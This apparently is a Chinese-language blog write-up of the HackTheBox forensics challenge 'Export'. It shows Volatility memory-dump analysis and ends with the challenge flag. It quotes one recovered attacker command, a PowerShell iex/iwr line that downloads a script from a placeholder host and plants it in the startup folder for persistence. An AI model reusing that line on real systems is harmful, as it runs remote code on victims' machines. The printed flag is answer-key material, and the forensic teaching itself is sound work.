HackTheBox-Forensic—Export #Windows #Volatility

zip里给了一个文件

WIN-LQPKRCS8Q5M-20201004-145724.raw

这是事件发生时受感染计算机的内存capture

可以用binwalk查看信息

列表很长,从信息中可以得知这是一个Windows memory dump

但是不知道Windows具体版本,可以通过Volatility的imageinfo工具来枚举可能的版本和配置文件

Volatility 是一个开源的内存取证工具,可以用于分析 Windows、Linux 和 Mac 系统的内存转储文件。

先尝试pslist列出目标系统中的进程列表

#指定配置为Win7SP1x64, 使用Volatility 的插件pslist来列出目标系统中的进程列表
python2 /opt/volatility/vol.py -f WIN-LQPKRCS8Q5M-20201004-145724.raw --profile=Win7SP1x64 pslist 

插件还有notepad(pslist中与notepad有关的内容)  cmdscan等

插件cmdscan可以提取目标系统内存中的console history

python2 /opt/volatility/vol.py -f WIN-LQPKRCS8Q5M-20201004-145724.raw --profile=Win7SP1x64 cmdscan

从运行结果中可以看到

cmdscan把一串url写到了startup目录下的3usy13fv.ps1文件中

echo iex (iwr "http://xxxx/test.ps1") >c:\user\appdata\startup/3usy12fv.ps1

iex: 这是 PowerShell 中的一个内置命令(别名),全称为 Invoke-Expression。它的作用是执行一个包含 PowerShell 语句的字符串。

(iwr "http://xxxx/test.ps1"): 这是一个嵌套的命令,使用了 PowerShell 的另一个内置命令 Invoke-WebRequest(简写为 iwr)。该命令从指定的 URL 下载一个名为 test.ps1 的 PowerShell 脚本。

这个命令的作用是从指定的 URL 下载一个 PowerShell 脚本,然后将其内容保存到指定的位置。如果在用户的启动目录下创建了一个这样的脚本,那么每次用户登录时,该脚本都将自动执行。

FLAG

可以看到解码的flag

HTB{W1Nd0ws_f0r3Ns1CS_3H?}

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值